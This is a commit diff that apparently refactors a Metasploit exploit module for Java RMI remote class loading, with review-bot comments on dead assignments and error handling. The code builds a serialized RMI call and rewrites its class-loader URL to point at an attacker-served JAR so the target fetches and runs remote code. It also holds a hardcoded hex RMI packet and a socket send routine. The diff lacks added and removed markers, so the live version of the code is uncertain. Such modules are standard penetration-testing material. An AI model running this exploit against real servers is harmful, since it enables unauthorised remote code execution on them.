Refactor exploit module
parent
956bf0c8f9
commit
873ade3b8a
@ -62,9 +62,9 @@ module Msf
|
|||
nsock = opts[:sock] || sock
|
||||
stream = build_call(opts)
|
||||
nsock.put(stream.encode)
|
||||
return_data = Rex::Proto::Rmi::Model::ReturnData.decode(nsock)
|
||||
#return_data = Rex::Proto::Rmi::Model::ReturnData.decode(nsock)
|
||||
|
||||
return_data.return_value
|
||||
#return_data.return_value
|
||||
end
|
||||
end
|
||||
end
|
||||
|
|
|
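Review bot: Only one of the two `return_data` pairs in `send_call` can be live, and whichever one is commented out should be deleted rather than left behind as `#return_data = Rex::Proto::Rmi::Model::ReturnData.decode(nsock)` / `#return_data.return_value`; the rendering does not show which side of the hunk each line is on. If the decode line is the new, live one, `send_call` reads and parses the server's reply, and `primer` (in the hunk below) only rescues `::RuntimeError` around the call, so a truncated or malformed reply would have to surface as that class to be reported cleanly — worth confirming what `ReturnData.decode` raises on bad input. If instead the decode line is the commented-out one, the method returns the result of `nsock.put`, and the `return_data = send_call(...)` assignment in `primer` is misleading. The enclosing `send_call` method starts above this hunk.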
@ -8,7 +8,7 @@ require 'msf/core'
|
|||
class Metasploit3 < Msf::Exploit::Remote
|
||||
Rank = ExcellentRanking
|
||||
|
||||
include Msf::Exploit::Remote::Tcp
|
||||
include Msf::Rmi::Client
|
||||
include Msf::Exploit::Remote::HttpServer
|
||||
|
||||
def initialize(info = {})
|
||||
|
@ -113,44 +113,27 @@ class Metasploit3 < Msf::Exploit::Remote
|
|||
end
|
||||
|
||||
def primer
|
||||
print_status("#{peer} - Sending RMI Header...")
|
||||
connect
|
||||
begin
|
||||
send_header
|
||||
rescue ::RuntimeError
|
||||
print_error("#{peer} - Filed to negotiate RMI protocol")
|
||||
disconnect
|
||||
return
|
||||
end
|
||||
|
||||
# Determine if the instance allows remote class loading
|
||||
print_status("#{peer} - Sending RMI Call...")
|
||||
jar = rand_text_alpha(rand(8)+1) + '.jar'
|
||||
old_url = "file:./rmidummy.jar"
|
||||
new_url = get_uri + '/' + jar
|
||||
packet = gen_rmi_packet
|
||||
# Java strings in serialized data are prefixed with a 2-byte, big endian length
|
||||
# (at least, as long as they are shorter than 65536 bytes)
|
||||
find_me = [old_url.length].pack("n") + old_url
|
||||
idx = packet.index(find_me)
|
||||
len = [new_url.length].pack("n")
|
||||
# Now replace it with the new url
|
||||
packet[idx, find_me.length] = len + new_url
|
||||
|
||||
# write out minimal header and packet
|
||||
print_status("#{peer} - Connected and sending request for #{new_url}")
|
||||
#sock.put("JRMI" + [2].pack("n") + "K" + [0].pack("n") + [0].pack("N") + packet);
|
||||
sock.put("JRMI" + [2,0x4b,0,0].pack("nCnN") + packet)
|
||||
|
||||
buf = ""
|
||||
1.upto(6) do
|
||||
res = sock.get_once(-1, 5) rescue nil
|
||||
break unless res
|
||||
break if session_created?
|
||||
buf << res
|
||||
begin
|
||||
return_data = send_call(call_data: build_gc_call_data(new_url))
|
||||
rescue ::RuntimeError
|
||||
fail_with(Failure::Unknown, "#{peer} - Failed to send RMI Call, anyway JAVA RMI Endpoint detected")
|
||||
end
|
||||
|
||||
disconnect
|
||||
|
||||
if buf =~ /RMI class loader disabled/
|
||||
fail_with(Failure::NotVulnerable, "#{peer} - The RMI class loader is disabled")
|
||||
end
|
||||
|
||||
if buf =~ /java.lang.ClassNotFoundException/
|
||||
fail_with(Failure::Unknown, "#{peer} - The RMI class loader couldn't find the payload")
|
||||
end
|
||||
|
||||
print_good("#{peer} - Target may be exploitable...")
|
||||
end
|
||||
|
||||
def on_request_uri(cli, request)
|
||||
|
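Review bot: `return_data = send_call(call_data: build_gc_call_data(new_url))` assigns a value that nothing else in `primer` reads, while the `fail_with(Failure::NotVulnerable, ...)` and `ClassNotFoundException` checks match on `buf`, which is only filled by the `sock.get_once` loop; if that loop is on the removed side of this hunk, the refactored `primer` can no longer tell a disabled class loader apart from an exploitable endpoint. The rendering does not mark which lines are old or new, so this is inferred from the 44 → 27 line counts and should be confirmed against the patched file. Either match on the decoded return value that `send_call` yields, or keep a response read before `disconnect`. Two smaller points: `print_error("#{peer} - Filed to negotiate RMI protocol")` should read `Failed`, and the `fail_with` inside `rescue ::RuntimeError` raises before the `disconnect` below it runs, so the socket is left to the framework's cleanup rather than closed explicitly.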
@ -175,20 +158,6 @@ class Metasploit3 < Msf::Exploit::Remote
|
|||
end
|
||||
end
|
||||
|
||||
|
||||
def gen_rmi_packet
|
||||
"\x50\xac\xed\x00\x05\x77\x22\x00\x00\x00\x00\x00\x00\x00\x02\x00" +
|
||||
"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00" +
|
||||
"\x00\xf6\xb6\x89\x8d\x8b\xf2\x86\x43\x75\x72\x00\x18\x5b\x4c\x6a" +
|
||||
"\x61\x76\x61\x2e\x72\x6d\x69\x2e\x73\x65\x72\x76\x65\x72\x2e\x4f" +
|
||||
"\x62\x6a\x49\x44\x3b\x87\x13\x00\xb8\xd0\x2c\x64\x7e\x02\x00\x00" +
|
||||
"\x70\x78\x70\x00\x00\x00\x00\x77\x08\x00\x00\x00\x00\x00\x00\x00" +
|
||||
"\x00\x73\x72\x00\x14\x6d\x65\x74\x61\x73\x70\x6c\x6f\x69\x74\x2e" +
|
||||
"\x52\x4d\x49\x4c\x6f\x61\x64\x65\x72\xa1\x65\x44\xba\x26\xf9\xc2" +
|
||||
"\xf4\x02\x00\x00\x74\x00\x13\x66\x69\x6c\x65\x3a\x2e\x2f\x72\x6d" +
|
||||
"\x69\x64\x75\x6d\x6d\x79\x2e\x6a\x61\x72\x78\x70\x77\x01\x00\x0a"
|
||||
end
|
||||
|
||||
def autofilter
|
||||
return true
|
||||
end
|
||||
|
|